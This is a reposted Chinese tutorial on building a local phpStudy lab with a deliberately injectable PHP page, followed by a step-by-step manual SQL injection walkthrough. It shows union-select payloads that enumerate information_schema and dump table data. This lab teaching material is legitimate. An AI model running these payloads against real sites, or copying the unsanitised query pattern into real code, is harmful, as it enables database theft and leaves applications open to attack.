2. 程式人生 > >[經驗技巧] “php+mysql+apache”環境搭建及"手動SQL註入",20180527-0

[經驗技巧] “php+mysql+apache”環境搭建及"手動SQL註入",20180527-0

阿新 發佈:2018-05-27
版本 lin AC 旗艦 分號 正常 HERE sele primary

[經驗技巧] “php+mysql+apache”環境搭建及"手動SQL註入"

1.“php+mysql+apache”環境搭建

  • 環境載體:虛擬機Window7 Service Pack 1 旗艦版

  • 技術分享圖片

  • 下載“phpStudy (php5.2) ”

  • 鏈接:http://www.phpstudy.net/phpstudy/phpStudy(PHP5.2).zip

文件見附件1。

安裝“phpStudy (php5.2) ”

  • 將壓縮包解壓後,雙擊“phpStudy(PHP5.2).exe”進行安裝

  • 技術分享圖片

  • 安裝結束後,彈出“使用手冊”及phpStudy窗體,點擊“應用”:

  • 技術分享圖片

  • 觀察到兩個指示燈由紅色變為綠色,說明“Apache”和“MySQL”已成功啟動:

  • 技術分享圖片

在mysql中新建數據庫及表

  • 打開“MySQL管理器”

  • 技術分享圖片

註:mysql的登錄名及密碼都是“root”。

技術分享圖片

  • 新建數據庫、表,並添加記錄

  • 點擊“SQL編輯器”選項卡,在編輯區域添加如下代碼然後選中並執行:

create database student;#創建一個新的數據庫,名為 student

use student;

create table class1(id int(20) not null AUTO_INCREMENT primary key,name varchar(20) not null,gender varchar(20),phone varchar(20));#在student數據庫中創建新表,名為class1,有4個字段 id、name、gender、phone

#插入3條記錄

insert into class1(name,phone,gender) values (‘own‘,‘13977888888‘,‘male‘);

insert into class1(name,phone,gender) values (‘hdh‘,‘13667777777‘,‘male‘);

insert into class1(name,phone,gender) values (‘ckm‘,‘15666666666‘,‘female‘);

#註意:每條語句後都用分號“;”作為結尾

技術分享圖片

執行SQL語句後,左側導航欄中出現了新創建的數據庫“student”。雙擊“student”後,點擊“數據瀏覽器”選項卡,看到了在表“class1”中添加的3條記錄:

技術分享圖片

也可導入sql腳本“class1.sql”來創建數據庫、表並添加記錄,見附件2。使用時如圖導入即可:

技術分享圖片

  • 若導入sql腳本後未看到應該被創建的數據庫“student”,點擊“視圖”選項卡中的“全部刷新”即可:

  • 技術分享圖片

2.配置含有sql註入點的網頁

  • 在phpStudy安裝目錄下的文件夾“WWW”中新建php網頁

網頁文件命名為“index.php”,在文件內添加如下代碼:

<?php

$con = mysql_connect("localhost","root","root") or die();#連接數據庫

mysql_select_db("student");#選擇student數據庫

$ID = $_GET[‘id‘];#獲取URL中的參數“id”

$sql = "select * from class1 where id=$ID";#構建sql查詢語句

/*若為字符型參數,則用 $sql = "select * from class1 where name=‘$name’";

$name左右加上單引號 */

echo "sql語句: ".$sql."<br >";

$res = mysql_query($sql);#執行查詢語句

while($rows = mysql_fetch_array($res)){

echo "姓名: ".$rows[‘name‘]."<br >";

echo "性別: ".$rows[‘gender‘]."<br >";

echo "電話: ".$rows[‘phone‘]."<br >";

}

mysql_close($con);

?>

文件“index.php”見附件3。該php代碼意為通過URL所傳入的參數“id”的值,構建sql查詢語句“select * from class1 where id”,最後輸出所返回的記錄中的三個字段“name”、“gender”、“phone”。

3.SQL註入

  • 判斷是否為sql註入點

    • 整形參數判斷

1、URL最後加上 and 1=1

2、URL最後加上 and 1=2

如果2異常,1正常就存在註入

本文使用的是整形參數,結果如下:

and 1=1

技術分享圖片

and 1=2

技術分享圖片

  • 猜字段數

http://127.0.0.1/?id=1 order by <n> #註:n是任意數字。若返回頁面正常,則該數字為字段數

技術分享圖片

  • 獲取數據庫名、用戶名、數據庫版本

http://127.0.0.1/?id=1 union select 1,database(),user(),version()

技術分享圖片

  • 猜解表名

    • 1.mysql版本在5.1後

      • mysql5.1後,設有一個表保存所有數據庫下的表名,據此查詢獲得指定數據庫下的表名

使用小葵工具轉化數據庫名“student”,得到hex值:

技術分享圖片

“小葵多功能轉換工具”見附件4。

將Hex值填到“where table_schema=”後。如是獲取了數據庫“student”下的表“class1”的表名:

http://127.0.0.1/?id=1 union select 1,table_name,2,3 from information_schema.tables where table_schema=0x73747564656E74

技術分享圖片

2.mysql版本在5.1前時,如何猜解表名

在URL後加入sql語句,返回正常表示存在該表名

<URL> and exists(select * from <所猜解的表名>)

  • 獲取指定表的列信息

    • 使用小葵工具轉化表名“class1”,得到hex值:

  • 技術分享圖片

  • 將Hex值填到”where table_name=”後。如是獲取了表“class1”的列信息。

http://127.0.0.1/?id=1 union select 1,column_name,2,3 from information_schema.columns where table_name=0x636C61737331

技術分享圖片

  • 猜解列名(字段名)

    • 在URL後加入sql語句,返回正常表示存在所猜解的列名

<URL> and exists(select <所猜解的列名> from <表名>)

  • 獲取指定列的數據

例如,獲取表“class1”中,列“phone”的數據:

http://127.0.0.1/?id=1 union select 1,phone,2,3 from class1

技術分享圖片

註: 若瀏覽器訪問頁面時出現亂碼,將瀏覽器編碼設置為“UTF-8”即可解決:

技術分享圖片

============================================

[經驗技巧] “php+mysql+apache”環境搭建及"手動SQL註入",20180527-0

相關推薦

[經驗技巧] “php+mysql+apache環境搭建&quot;手動SQL&quot;20180527-0

版本 lin AC 旗艦 分號 正常 HERE sele primary [經驗技巧] “php+mysql+apache”環境搭建及"手動SQL註入" 1.“php+mysql+apache”環境搭建 環境載體:虛擬機Window7 Service Pack 1

win7系統搭建PHP+Mysql+Apache環境+部署ecshop專案

安裝環境背景:Win7 x64位系統,搭建PHP+MySQL+Apache環境,實現ECshop專案開發。 1、下載php最新安裝包php-7.0.10RC1-Win32-VC14-x64;提示:需要vc++14 執行庫 才能執行php.exe 2、下載並安裝mysql,使

php環境搭建 apache+php+mysql獨立環境搭建經歷

下載:apache2.4.17+php7.0.0+mysql5.7.10-64位安裝包,解壓 該安裝包下載地址:http://pan.baidu.com/s/1b0yR3C 在C盤主目錄下建立資料夾:kitWeb 將”http...“解壓出來並命名為apache24,並

MySQL— pymysql模塊(防止sql可視化軟件Navicat

字典類 open weight 學習 增加 所有 avi isp 實現 一.Pymysql import pymysql #python2.X 中是 mysqldb 和 pythonmysql 用法是一模一樣的 #pymysql可以偽裝成上面這兩個模塊

CentOS+Nginx+Tomcat+Mysql+PHP 環境搭建系統部署

Linux Centos tomcat mysql nginx ==============安裝centos 7.0=======================選擇最小安裝,將相關的"調試工具"、“兼容性程序庫”、“開發工具”選中。此操作是為了減少後期安裝或編譯相關服

linux上搭建PHP環境php+mysql+apache

一、獲取安裝包 PHP下載地址:http://cn.php.net/distributions/php-7.1.10.tar.gz Apache下載地址:http://mirrors.tuna.tsinghua.edu.cn/apache//httpd/httpd-2.4.28.

windows快速搭建本地apache php mysql開發環境多站點域名訪問

windows快速搭建本地apache+php+mysql開發環境,多站點域名訪問 所需軟體: XAMPP 2.5 下載好之後傻瓜式安裝,推薦將安裝目錄改到除C盤以外的盤(預設站點目錄和mysql資料都是在安裝目錄中) 我這裡是安裝在D盤(D:\xamp

有關apache+php+mysql的相關下載配置

load nbsp image pac 點擊 mysql windows 相關 php 01. Apache的下載及配置   apache的下載地址:http://httpd.apache.org 點擊:download下載 之後跳轉 點擊:Files

Apache+php+MySQL 安裝注意細節常見錯誤

1: 完成apache的安裝(一路預設) 1> 修改httpd.conf 中documentroot 為 E:\web server\Apache24\htdocs (即你的網站存放目錄) 有的直接修改這一行的 Define SRVROOT "E:\web server\Apache24",則

windows+PHP+MySQL+Apache自定義環境解除安裝

1.PHP的解除安裝 直接刪除PHP的資料夾 2.MySQL的解除安裝 1)以管理員的身份執行CMD 執行命令:sc delete mysql 2)清除登錄檔: 在檔案資源管理器中輸入“C:\Windows\regedit.exe"彈出登錄檔 刪除HKEY_LOCAL_M

Linux+Apache+Oracle+php Centos7下環境搭建 安裝Oracle 用yum安裝Apache 安裝php php與oracle連線

因為學校課設的原因,在什麼伺服器都不懂的情況下,強行自己百度安裝LAOP,覺得網上教程太少,而且千篇一律很多都看不太懂,覺得人生太絕望了。寫一篇給小白用。我的Centos7是實體安裝的,虛擬機器應該也可以這樣安裝吧。 下面的順序是我安裝的順序,僅供參考。 一、安裝orac

【配置伺服器環境學習筆記】linux伺服器配置php+mysql+Apache

linux伺服器配置php+mysql+Apache 第一步、註冊一個雲主機 先註冊一個雲主機,或者用虛擬主機,我用的是騰訊雲的一元雲主機,是專門針對在校大學生的。詳情大家可以看一下官網https:/

MySQL環境搭建SQL查詢語句練習

前言 這個學期有資料庫原理這門課,其中很重要的一個部分就是SQL查詢語句的練習。但是自己手寫的查詢語句如果不測試的話是不知道是否正確的,而也不可能指望老師會檢查每個人的查詢語句的正確性。所以只能自力更生,親自實踐,測試查詢語句的正確性。 MySQL環境搭建

centos搭建Nginx+PHP+MySql+Redis環境詳細步驟(CentOS7環境

一、安裝Nginx 1、下載nginx-release包 2、匯入GPG signing key 3、安裝1中下載的軟體包。 yum install /home/develop/nginx-release-centos-7-0.el7.ngx.noarch.rpm 其中“/home/dev

php服務器環境安裝項目搭建

b-s mar 安裝 adb 編輯 mct var php 圖片 2安裝運行環境及搭建項目2.1安裝apache及測試1)安裝apacheyum install httpd 啟動apache systemctl start httpd.service 查看運行狀態 syst

基於Linux安裝Apache環境搭建過程報錯解決方案

⁄(⁄ ⁄•⁄ω⁄•⁄ ⁄)⁄決定寫一篇完整的了!! 一、需要準備的安裝包: 二、上傳到Linux系統裡,tar -zxvf 解壓,再分別進入三個資料夾編譯 首先把三個壓縮包都傳入/usr/lo

2018最新Windows環境下安裝php+mysql+Apache開發環境

安裝php的開發環境對於很多初學者來說可能是一個小問題,介於網上很多教程過於老舊或者不夠完善,今天小編嘗試梳理一下,希望對大家有幫助 廢話不多說,直接上教程,至於下載32/64位的軟體,隨你們電腦作業系統是幾位的哦~

ubuntu 環境搭建 php 版本升級

 step: 0. apt-get update 1. apt-get install apache2 2. apt-get install php5 libapache2-mod-php5 (5.3) upgrade to php5.5 sudo apt-get upd

NDK在windows下的開發環境搭建開發過程

刷新 -1 ont static blog 簡單 包名 mfp targe 在Android應用的開發project中。無論是遊戲還是普通應用。都時常會用到.so即動態鏈接庫,關於.so是什麽玩意兒,有什麽優點。這個大家能夠在網上查一下,本人不做過多解釋。.

maven的環境搭建使用

技術分享 信息 幫助 解壓 使用 project 打印 jdk版本 規範 maven的環境搭建及使用 一、maven介紹及作用 maven是一個項目構